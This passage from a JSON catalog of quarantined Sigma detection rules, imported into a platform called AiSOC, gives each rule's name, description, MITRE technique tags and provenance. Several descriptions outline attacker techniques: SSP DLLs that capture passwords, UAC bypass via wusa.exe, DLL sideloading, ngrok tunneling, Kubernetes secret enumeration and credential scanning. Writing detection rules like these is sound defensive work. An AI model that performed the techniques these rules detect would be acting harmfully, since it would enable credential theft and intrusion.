from image file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1027.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/steganography-unzip-hidden-information-from-picture-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd595d7-7895-4fa7-acb3-85a18a8772ca", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_unzip_hidden_zip_files_steganography.yml" } }, { "id": "sigmahq-sigma-edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "type": "detection", "name": "Renamed Jusched.EXE Execution", "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-jusched-exe-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_jusched.yml" } }, { "id": "sigmahq-sigma-ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "type": "detection", "name": "Suspicious DNS Z 
Flag Bit Set", "description": "The DNS Z flag is a bit within the DNS protocol header that is, per the IETF design, meant to be reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1095", "T1571" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-dns-z-flag-bit-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/zeek/zeek_dns_susp_zbit_flag.yml" } }, { "id": "sigmahq-sigma-edf3485d-dac4-4d50-90e4-b0e5813f7e60", "type": "detection", "name": "Suspicious Network Connection to IP Lookup Service APIs", "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". 
This could be indicative of potential post compromise internet test activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-network-connection-to-ip-lookup-service-apis.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml" } }, { "id": "sigmahq-sigma-ee111937-1fe7-40f0-962a-0eb44d57d174", "type": "detection", "name": "Suspicious OAuth App File Download Activities", "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-oauth-app-file-download-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee111937-1fe7-40f0-962a-0eb44d57d174", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/cloud/m365/threat_management/microsoft365_susp_oauth_app_file_download_activities.yml" } }, { "id": "sigmahq-sigma-ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "type": "detection", "name": "Powershell Inline Execution From A File", "description": "Detects inline execution of PowerShell code from a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-inline-execution-from-a-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml" } }, { "id": "sigmahq-sigma-ee2803f0-71c8-4831-b48b-a1fc57601ee4", "type": "detection", "name": "Google Workspace Application Removed", "description": "Detects when an application is removed from Google Workspace.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-application-removed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_application_removed.yml" } }, { "id": "sigmahq-sigma-ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "type": "detection", "name": "PUA - Ngrok Execution", "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-ngrok-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" } }, { "id": "sigmahq-sigma-ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "type": "detection", "name": "Okta FastPass Phishing Detection", "description": "Detects when Okta FastPass prevents a known phishing site.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-fastpass-phishing-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee39a9f7-5a79-4b0a-9815-d36b3cf28d3e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_fastpass_phishing_detection.yml" } }, { "id": "sigmahq-sigma-ee4c5d06-3abc-48cc-8885-77f1c20f4451", "type": "detection", "name": "DLL Sideloading Of ShellChromeAPI.DLL", "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-sideloading-of-shellchromeapi-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_shell_chrome_api.yml" } }, { "id": "sigmahq-sigma-ee5e119b-1f75-4b34-add8-3be976961e39", "type": "detection", "name": "Conhost.exe CommandLine Path Traversal", "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], 
"log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/conhost-exe-commandline-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee5e119b-1f75-4b34-add8-3be976961e39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml" } }, { "id": "sigmahq-sigma-ee63c85c-6d51-4d12-ad09-04e25877a947", "type": "detection", "name": "New Custom Shim Database Created", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.009" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-custom-shim-database-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee63c85c-6d51-4d12-ad09-04e25877a947", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_creation_new_shim_database.yml" } }, { "id": 
"sigmahq-sigma-ee6cea48-c5b6-4304-a332-10fc6446f484", "type": "detection", "name": "Potential appverifUI.DLL Sideloading", "description": "Detects potential DLL sideloading of \"appverifUI.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-appverifui-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee6cea48-c5b6-4304-a332-10fc6446f484", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_appverifui.yml" } }, { "id": "sigmahq-sigma-ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "type": "detection", "name": "Potential Attachment Manager Settings Attachments Tamper", "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-attachment-manager-settings-attachments-tamper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" } }, { "id": "sigmahq-sigma-ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "type": "detection", "name": "New PDQDeploy Service - Server Side", "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-pdqdeploy-service-server-side.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml" } }, { "id": "sigmahq-sigma-eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "type": "detection", "name": "Security Support Provider (SSP) Added to LSA Configuration", "description": "Detects the addition of a SSP to the registry. 
Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/security-support-provider-ssp-added-to-lsa-configuration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" } }, { "id": "sigmahq-sigma-eeb3e9e1-b685-44e4-9232-6bb701f925b5", "type": "detection", "name": "Kubernetes Secrets Enumeration", "description": "Detects enumeration of Kubernetes secrets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-secrets-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eeb3e9e1-b685-44e4-9232-6bb701f925b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_secrets_enumeration.yml" } }, { "id": 
"sigmahq-sigma-eed82177-38f5-4299-8a76-098d50d225ab", "type": "detection", "name": "Kubernetes Admission Controller Modification", "description": "Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078", "T1552", "T1552.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-admission-controller-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "eed82177-38f5-4299-8a76-098d50d225ab", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_change_admission_controller.yml" } }, { "id": "sigmahq-sigma-eee00933-a761-4cd0-be70-c42fe91731e7", "type": "detection", "name": "Arbitrary File Download Via GfxDownloadWrapper.EXE", "description": "Detects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-gfxdownloadwrapper-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "eee00933-a761-4cd0-be70-c42fe91731e7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml" } }, { "id": "sigmahq-sigma-ef0ff092-a24a-4fbc-beea-06c08d53e085", "type": "detection", "name": "Cisco Dot1x Disabled", "description": "Detects the manual disablement of IEEE 802.1X (dot1x) on a Cisco network device interface.\nDisabling dot1x bypasses Network Access Control (NAC) mechanisms, potentially allowing unauthorized devices to gain access to the internal network.\nThis activity is a common technique used by attackers or malicious insiders to establish persistence or perform lateral movement via rogue devices.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1556.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cisco-dot1x-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef0ff092-a24a-4fbc-beea-06c08d53e085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/cisco/aaa/cisco_cli_dot1x_disabled.yml" } }, { "id": "sigmahq-sigma-ef61af62-bc74-4f58-b49b-626448227652", "type": "detection", "name": "Suspicious Active Directory Database Snapshot Via ADExplorer", "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory. 
This can be used by attackers to extract data for Bloodhound, usernames for password spraying or use the meta data for social engineering. The snapshot doesn't contain password hashes but there have been cases, where administrators put passwords in the comment field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1087.002", "T1069.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-active-directory-database-snapshot-via-adexplorer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef61af62-bc74-4f58-b49b-626448227652", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_adexplorer_susp_execution.yml" } }, { "id": "sigmahq-sigma-ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "type": "detection", "name": "Wusa.EXE Executed By Parent Process Located In Suspicious Location", "description": "Detects execution of the \"wusa.exe\" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.\nAttackers could instantiate an instance of \"wusa.exe\" in order to bypass User Account Control (UAC). 
They can duplicate the access token from \"wusa.exe\" to gain elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wusa-exe-executed-by-parent-process-located-in-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef64fc9c-a45e-43cc-8fd8-7d75d73b4c99", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wusa_susp_parent_execution.yml" } }, { "id": "sigmahq-sigma-ef9dcfed-690c-4c5d-a9d1-482cd422225c", "type": "detection", "name": "Browser Execution In Headless Mode", "description": "Detects execution of Chromium based browser in headless mode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/browser-execution-in-headless-mode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ef9dcfed-690c-4c5d-a9d1-482cd422225c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml" } }, { "id": 
"sigmahq-sigma-efafe0bf-4238-479e-af8f-797bd3490d2d", "type": "detection", "name": "Outbound Network Connection Initiated By Cmstp.EXE", "description": "Detects a network connection initiated by Cmstp.EXE\nIt's uncommon for \"cmstp.exe\" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/outbound-network-connection-initiated-by-cmstp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efafe0bf-4238-479e-af8f-797bd3490d2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_cmstp_initiated_connection.yml" } }, { "id": "sigmahq-sigma-efc21479-9e83-41da-8cf1-122e06ba8db3", "type": "detection", "name": "HackTool - NetExec File Indicators", "description": "Detects file creation events indicating NetExec (nxc.exe) execution on the local machine.\nNetExec is a PyInstaller-bundled binary that extracts its embedded data files to a \"_MEI\" directory\nunder the Temp folder upon execution. 
Files dropped under the \"\\nxc\\\" sub-directory of that\nextraction path are unique to NetExec and serve as reliable on-disk indicators of execution.\nNetExec (formerly CrackMapExec) is a widely used post-exploitation and lateral movement tool used for\nActive Directory enumeration, credential harvesting, and remote code execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-netexec-file-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efc21479-9e83-41da-8cf1-122e06ba8db3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_netexec_file_indicators.yml" } }, { "id": "sigmahq-sigma-efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "type": "detection", "name": "Suspicious Program Names", "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-program-names.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", "source_commit": "df5c6a6", 
"license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_progname.yml" } }, { "id": "sigmahq-sigma-efec536f-72e8-4656-8960-5e85d091345b", "type": "detection", "name": "Set Suspicious Files as System Files Using Attrib.EXE", "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/set-suspicious-files-as-system-files-using-attrib-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "efec536f-72e8-4656-8960-5e85d091345b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml" } }, { "id": "sigmahq-sigma-f0025a69-e1b7-4dda-a53c-db21fa2d4071", "type": "detection", "name": "Script Interpreter Spawning Credential Scanner - Linux", "description": "Detects a script interpreter process (like node.js or bun) spawning a known credential scanning tool (e.g., trufflehog, gitleaks).\nThis behavior is indicative of an attempt to find and steal secrets, as seen in the \"Shai-Hulud: The Second Coming\" campaign.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" 
], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1005", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/script-interpreter-spawning-credential-scanner-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "f0025a69-e1b7-4dda-a53c-db21fa2d4071", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_script_interpretor_spawn_credential_scanner.yml" } }, { "id": "sigmahq-sigma-f01d1f70-cd41-42ec-9c0b-26dd9c22bf29", "type": "detection", "name": "Process Deletion of Its Own Executable", "description": "Detects the deletion of a process's executable by itself. 
